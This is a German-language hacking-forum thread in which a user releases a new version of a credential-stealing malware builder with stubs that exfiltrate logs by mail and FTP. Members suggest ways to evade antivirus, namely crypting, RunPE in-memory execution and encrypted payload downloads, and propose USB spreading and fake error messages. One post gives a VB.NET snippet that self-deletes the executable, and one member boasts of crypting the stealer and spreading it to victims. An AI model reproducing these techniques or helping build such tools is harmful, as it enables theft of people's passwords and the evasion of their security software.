38 Antworten in diesem Thema

[Cube]

Jetzt liegt die neue Version seit fast 2 Wochen auf meiner Platte.
Nun wird sie auch der Allgemeinheit zur Verfügung gestellt

Changelog:

• Added Filebinder (only Drop & Execute)
• Add Save as .com (Command file)
• Modded Melt (Selfdestruction)
• Minor Builder Bugfixes
• Fixed Filezilla-Recovery Logview
• Some GUI Changes
• Improved Log Sorter

Builder Screen


Stealoptions


Scans
Builder:

Please Login HERE or Register HERE to see this link!

Stub1 (Filename:Microsoft):

Please Login HERE or Register HERE to see this link!

Stub2 (Filename:Windows):

Please Login HERE or Register HERE to see this link!

Sorter:

Please Login HERE or Register HERE to see this link!

(Detections kommen vom obfuscating)

NewsUpdate:
Es wird vlt so manchen trösten, dass ein Boardmitglied mir eventuell Hilfestellung ,um das Problem mit der Runtime Detections zu eliminieren. Desweiteren arbeiten 2 weitere Jungs an einem hübschen Panel Also mal sehen was die Zukunft bringt

Downloadlink

Please Login HERE or Register HERE to see this link!

Rar Password

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.

Viel Spaß.
Sollten Bugs auftauchen oder es Verbesserungsvorschläge geben, stehe ich gerne bereit.

Grüße
Cube

[Das]

Muss gleich mal Testen

[hikhack7]

Hallo

Also wenn ich das richtige verstehe, werden die Nirsoft-Tools nur gedroppt? Nicht verschlüsselt oder so?
Dann ist klar, dass es eine Runtime-Detection geben kann.

Besser: Verschlüsseln, Droppen, Entschlüsseln -> RunPE mit Parameter. Logs auslesen.

Zur Melt-Funktion. Die ist ein bisschen buggy. Würde eine Alternative vorschlagen (Vb .net):

File.Move(Application.ExecutablePath, Environ("tmp") & "\tmpG" & Date.Now.Millisecond.ToString & ".tmp")
Environment.Exit(0)

Trotzdem schön zu sehen, dass es wieder einige Coder/Tools gibt. Auch wenn das Level nicht wirklcih steigt ;-)

PS:
Warum hast du 2 Stubs ausgeliefert? Eine für .Net Framework 2.0 und eine für 4.0?

Lg

[Cube]

Hallo

Also wenn ich das richtige verstehe, werden die Nirsoft-Tools nur gedroppt? Nicht verschlüsselt oder so?
Dann ist klar, dass es eine Runtime-Detection geben kann.

Besser: Verschlüsseln, Droppen, Entschlüsseln -> RunPE mit Parameter. Logs auslesen.

Zur Melt-Funktion. Die ist ein bisschen buggy. Würde eine Alternative vorschlagen (Vb .net):

File.Move(Application.ExecutablePath, Environ("tmp") & "tmpG" & Date.Now.Millisecond.ToString & ".tmp")
Environment.Exit(0)

Trotzdem schön zu sehen, dass es wieder einige Coder/Tools gibt. Auch wenn das Level nicht wirklcih steigt ;-)

PS:
Warum hast du 2 Stubs ausgeliefert? Eine für .Net Framework 2.0 und eine für 4.0?

Lg

Nirsoft Tools werden gedroppt ja.
Ist vlt leicht gesagt "code ne RunpE mit Paramter support". Paxis sieht aber anders aus .png' class='bbc_emoticon' alt='^^' />
Boardkollege gibt mir Hilfestellung wenn er Zeit hat

Danke für den Melt-Tipp
Ich weis dass es buggy ist. Nutze ne ganz simple .bat datei die im temp Ordner ausgeführt wird und den eigentlichen Server deleted.

Zu den Stubs:
Hat nichts mit 2.0 und 4.0 zu tun.
Habe eine für Mail und eine für FTP ausgelegt, damit nicht beides in einer behandelt wird
Fand ich persönlich etwas praktischer.

Grüße
Cube

Bearbeitet von Cube, 20 May 2014 - 10:58 Uhr.

[hikhack7]

Hey Cube

Ja ich weiss das ist einfach gesagt und in der Umsetzung nicht ganz so easy. Rede jedoch aus Erfahrung darum erlaube ich mir diesen Verbesserungsvorschlag zu geben :-)

Okay, das mit den 2 Stubs ist zwar ne lustige vorgehensweise aber auch nicht schlecht durchdacht.

Vielleicht könntest du noch eine Stub für das Framework 2.0 ausliefern und eine für 4.0.
Weil das Problem ist, dass ab Windows 8 keine Programme mit Framework 2.0 laufen. Es wird gefragt ob es das 3.5 herunterladen soll um die 2.0er auszuführen

Man müsste theoretisch ein Programm schreiben (nativ) welches überprüft welche Version installiert ist und diese dann auch je nach System nachlädt.

Windows 8 -> .Net Framework 4.0/4.5 vorinstalliert (.net 2.0 oder 3.5 läuft nicht ohne weiteres)
Windows 7 -> .Net Framework 2.0 funktioniert

Falls du daran Interesse hast, kann ich dir Hilfestellung geben. (pn)

Lg

Bearbeitet von hikhack7, 20 May 2014 - 18:16 Uhr.

[most_uniQue]

Wie schautsn eig aus mit USB Spreading oder so ?

lg

[Cube]

Wie schautsn eig aus mit USB Spreading oder so ?

lg

Schon drüber nachgedacht ja.
Warte jetzt mal mit Rastajan in Verbindung zu kommen.
Sehr beschäftigter Typ

und @hihhack: Sie haben Post

Grüße

[Iron]

Mich würde noch freuen, wenn du eine Funktion ein baust die eine beliebige Fehlermeldung nach Wahl ausgeben kann mit Icon usw. und noch eine Funktion das ganze vom eigenen PC zu entfernen.

[most_uniQue]

Also zusammengefasst:

1. Die Tipps von hihack
2. USB Spreading
3. Fake Errors + Cure Funktion

lg

[Cube]

Mich würde noch freuen, wenn du eine Funktion ein baust die eine beliebige Fehlermeldung nach Wahl ausgeben kann mit Icon usw. und noch eine Funktion das ganze vom eigenen PC zu entfernen.

Ne Fake Message ließe sich einrichten.

Aber was meinst du mit Selbstbereinigung?
Da wird ja nichts installiert etc?
Was willst du da entfernen?

[Iron]

Achso dachte das wäre jeden Start-Up. Um so besser das nichts installiert wird

Bearbeitet von Iron, 21 May 2014 - 15:39 Uhr.

[Cube]

Also zusammengefasst:

1. Die Tipps von hihack
2. USB Spreading
3. Fake Errors + Cure Funktion

lg

Fake Message wird auf jedenfall kommen.
Über diverse Spreading Methoden werde ich mir noch den kopf zerbrechen.
Cure Function brauchen wir nicht, da nichts installiert wird

Achso dachte das wäre jeden Start-Up. Um so besser das nichts installiert wird

Nope Start-Up Funktion halte ich persönlich bei einem Stealer etwas unnötig?
Braucht ja nur einmalig die Logs.
Würde sich nur als praktisch erweisen, wenn man gezielt Angriffe starten.

Wennst gewünscht wird, kann ichs aber denke ich einrichten

Grüße
Cube

[most_uniQue]

Also für 4.2 wär geil nen Fake Error und die Spreadings, dann ist er so gut wie perfekt.

Und nochmal. Super Arbeit Cube. !

lg

[Cube]

Also für 4.2 wär geil nen Fake Error und die Spreadings, dann ist er so gut wie perfekt.

Und nochmal. Super Arbeit Cube. !

lg

Die Fake Message is gleich geschrieben.
Was mir mehr am Herzen liegt für Version 4.2 ist das ganze mal Runtime Lauffähig zu bekommen .png' class='bbc_emoticon' alt='^^' />
Hoffe hierbei auf Rastajan. Da er mir die Hilfe angeboten hat, will ich ihn aber auch nicht zuspammen.
Folglich wirds erst ein Versionsupdate geben, wenn mir Rasta ausgeholfen hat
Aber keien Sorge.
Ich werds hier dann posten hehe.

Grüße

[most_uniQue]

Wie schnell bist du denn bitte ?

Wie ich jetzt weiß, ist der bis jetzt nur Scantime FUD oder wie war das ?


Danke

lg

[Cube]

Wie schnell bist du denn bitte ?

Wie ich jetzt weiß, ist der bis jetzt nur Scantime FUD oder wie war das ?


Danke

lg

Fake Message is wirklich keine Hexerei.
Schreib nen zusätzlichen Wert in die Stub, die dann checkt ob ne Fake Message erwünscht ist.
Dauert wenns hoch kommt vlt 15 Minuten.

Das Problem ist das Runtime FUD. Korrekt.
Der läuft atm nur Scantime, da die Nirsoft Tools noch gedroppt werden.
Leider gehen meine Kenntnisse noch nicht bis ins Unendliche
So wie ich das verstanden habe, lässt mir Rastajan eventuell ne RunPE mit Paramter Support zukommen, dann dürfte das eigentlich kein Problem werden.
Somit würde die 3. Anbieter Tools nur noch im RAM ausgeführt werden und das ganze wäre Runtime cryptbar.
Das wäre das echte Highlight für mich persönlich^^
Abwartn und Tee trinken, wie ich immer so schön sage

[most_uniQue]

Achso. Macht das die Stub nicht vllt nicht mehr so ganz UD ? Kenn mich mit Stubs nicht so aus..


Ja kein Problem. Ich will dich ja nicht hetzen. Will einfach nur mal meinen Wissensstand über dein Stealer auffrischen
Hab bei HF was wegen RunPE mit Parameter Support gefunden ? Aber für Delphi so wie ich es verstanden hab.

BOOL WINAPI CreateProcess(
_In_opt_ LPCTSTR lpApplicationName,
_Inout_opt_ LPTSTR lpCommandLine, <==
_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,
_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
_In_ BOOL bInheritHandles,
_In_ DWORD dwCreationFlags,
_In_opt_ LPVOID lpEnvironment,
_In_opt_ LPCTSTR lpCurrentDirectory,
_In_ LPSTARTUPINFO lpStartupInfo,
_Out_ LPPROCESS_INFORMATION lpProcessInformation
);

Im Prinzip ist er cryptbar und funktioniert noch einwandfrei danach ?


Wenn das mit Rastajan klappt und das alles so im RAM läuft, wär das die Krönung

Aber soweit komme ich mit dem Ding ganz gut zurecht

lg

[Cube]

Mit Delphi fang ich nichts an haha.
So einfach geht dass dann auch wieder nicht, sonst hätt ichs schon längst bewerkstelligt^^

Der Stealer müsste auch jetzt cryptbar sein, nur ist er dann maximal Scantime FUD.
Und wenn die Nirsoft Tools eben im RAM gedroppt werden, ist er nach nem crypt auch Runtime FUD
Korrekt.

[hikhack7]

Allerdings sind die Nirsoft Tools nur dann Runtime-FUD wenn du sie verschlüsselt hochlädst und Byteweise beim herunterladen entschlüsselst. (Oder nach dem Download), sonst wird der Browser-Schutz des AV's aktiv - zumindest bei Avira.

Bearbeitet von hikhack7, 21 May 2014 - 16:18 Uhr.

[most_uniQue]

Ja, wie gesagt ich kenn mich da nicht so aus mit

Okay supper danke für die Auskunft. Ich werd mal schauen, wer heute wieder auf APEX-Spreading reinfällt
Hab ihn wieder auf 1/39 Detectionrate gecrypted
Kleiner Beweis

Please Login HERE or Register HERE to see this link!

Danke nochmal.

lg
most_uniQue

Bearbeitet von most_uniQue, 21 May 2014 - 16:41 Uhr.